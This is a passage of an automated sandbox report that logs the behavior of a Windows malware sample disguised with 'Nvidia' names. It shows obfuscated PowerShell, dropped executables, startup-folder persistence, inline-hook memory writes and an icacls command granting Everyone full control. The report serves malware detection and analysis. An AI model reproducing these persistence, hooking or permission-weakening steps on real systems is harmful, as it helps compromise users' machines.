Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: webio.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: python313.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: magnification.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: netapi32.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: version.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: wsock32.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: wtsapi32.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: d3d9.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: dwmapi.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: kernel.appcore.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: dwmapi.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: windows.storage.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: wldp.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: netutils.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: uxtheme.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: security.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: secur32.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: sspicli.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: olepro32.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: vcruntime140.dll
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: textshaping.dll
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: Nvidia-75619.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Nvidia-75619\Nvidia-75619.exe
Source: C:\Nvidia-75619\Nvidia-75619.exeWindow found: window name: TEditJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: PVKDyWHOaX.exeStatic PE information: certificate valid
Source: PVKDyWHOaX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PVKDyWHOaX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Nvidia-75619.exe, 0000000B.00000002.2625232422.0000000003B41000.00000020.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Nvidia-75619.exe, 0000000B.00000002.2625232422.0000000003B41000.00000020.10000000.00040000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('QwA6AFwATgB2AGkAZABpAGEA')))${f9bb78b0edf5474dac7fd2bfa5a929c4} = Get-Random -Minimum 10000 -Maximum 99999${159d02cf6c7b473990f4b55553ac77fb} = $ExecutionContext.InvokeCommand.Expand
Source: initial sampleStatic PE information: section where entry point is pointing to: .2"V
Source: play.exe.2.drStatic PE information: section name: .!Zx
Source: play.exe.2.drStatic PE information: section name: .]#m
Source: play.exe.2.drStatic PE information: section name: .2"V
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeCode function: 0_2_00007FF848F300BD pushad ; iretd 0_2_00007FF848F300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848DFD2A5 pushad ; iretd 2_2_00007FF848DFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F25E64 push edi; ret 2_2_00007FF848F25E79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F100BD pushad ; iretd 2_2_00007FF848F100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F178CB push ebx; retf 2_2_00007FF848F1796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F180ED push ebx; ret 2_2_00007FF848F1816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F25FE4 push edi; ret 2_2_00007FF848F25FF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FE6DCC push eax; iretd 2_2_00007FF848FE6DCD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FE8098 pushad ; iretd 2_2_00007FF848FE8099
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FE6FC6 pushad ; iretd 2_2_00007FF848FE6FCD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8492A5270 push esi; iretd 2_2_00007FF8492A527A

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls\BitsProxy.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-75619\play.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-75619\Nvidia-75619.exe (copy)Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-75619.lnkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-75619.lnkJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 11B0005 value: E9 8B 2F D4 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2F90 value: E9 7A D0 2B 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 11D0005 value: E9 5B 2E D2 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2E60 value: E9 AA D1 2D 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 11E0005 value: E9 EB 3E D1 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF3EF0 value: E9 1A C1 2E 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 15F0005 value: E9 DB 2F 90 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2FE0 value: E9 2A D0 6F 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1AD0005 value: E9 BB 2D 42 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2DC0 value: E9 4A D2 BD 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1AE0005 value: E9 CB 2A 41 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2AD0 value: E9 3A D5 BE 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1AF0005 value: E9 7B 2B 40 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2B80 value: E9 8A D4 BF 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1B00005 value: E9 1B 2F 3F 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2F20 value: E9 EA D0 C0 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1B10005 value: E9 FB 2C 3E 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2D00 value: E9 0A D3 C1 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1B20005 value: E9 DB 2D 3D 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2DE0 value: E9 2A D2 C2 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1B30005 value: E9 AB 3E 3C 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF3EB0 value: E9 5A C1 C3 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1B40005 value: E9 2B 2F 3B 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2F30 value: E9 DA D0 C4 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1B50005 value: E9 9B 2F 3A 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2FA0 value: E9 6A D0 C5 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1B60005 value: E9 0B 2D 39 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2D10 value: E9 FA D2 C6 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1B70005 value: E9 CB 3B 38 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF3BD0 value: E9 3A C4 C7 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1B80005 value: E9 2B 2D 37 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2D30 value: E9 DA D2 C8 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1B90005 value: E9 4B 47 36 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF4750 value: E9 BA B8 C9 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1BA0005 value: E9 BB 2C 35 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2CC0 value: E9 4A D3 CA 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1BB0005 value: E9 8B 3B 34 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF3B90 value: E9 7A C4 CB 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1BC0005 value: E9 5B 2B 33 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2B60 value: E9 AA D4 CC 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 1BD0005 value: E9 6B 2B 32 75 Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7488 base: 76EF2B70 value: E9 9A D4 CD 8A Jump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 11B0005 value: E9 8B 2F D4 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2F90 value: E9 7A D0 2B 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 11C0005 value: E9 5B 2E D3 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2E60 value: E9 AA D1 2C 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 11D0005 value: E9 EB 3E D2 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF3EF0 value: E9 1A C1 2D 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 11F0005 value: E9 DB 2F D0 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2FE0 value: E9 2A D0 2F 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 16C0005 value: E9 BB 2D 83 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2DC0 value: E9 4A D2 7C 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 16D0005 value: E9 CB 2A 82 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2AD0 value: E9 3A D5 7D 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 16E0005 value: E9 7B 2B 81 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2B80 value: E9 8A D4 7E 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 16F0005 value: E9 1B 2F 80 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2F20 value: E9 EA D0 7F 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 1700005 value: E9 FB 2C 7F 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2D00 value: E9 0A D3 80 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 1710005 value: E9 DB 2D 7E 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2DE0 value: E9 2A D2 81 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 1720005 value: E9 AB 3E 7D 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF3EB0 value: E9 5A C1 82 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 1730005 value: E9 2B 2F 7C 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2F30 value: E9 DA D0 83 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 1740005 value: E9 9B 2F 7B 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2FA0 value: E9 6A D0 84 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 1750005 value: E9 0B 2D 7A 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2D10 value: E9 FA D2 85 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 1760005 value: E9 CB 3B 79 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF3BD0 value: E9 3A C4 86 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 1780005 value: E9 2B 2D 77 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2D30 value: E9 DA D2 88 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 1790005 value: E9 4B 47 76 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF4750 value: E9 BA B8 89 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 17A0005 value: E9 BB 2C 75 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2CC0 value: E9 4A D3 8A 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 18C0005 value: E9 8B 3B 63 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF3B90 value: E9 7A C4 9C 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 18D0005 value: E9 5B 2B 62 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2B60 value: E9 AA D4 9D 8A
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 18E0005 value: E9 6B 2B 61 75
Source: C:\Nvidia-75619\Nvidia-75619.exeMemory written: PID: 7732 base: 76EF2B70 value: E9 9A D4 9E 8A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-75619 /grant Everyone:F /T /C
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
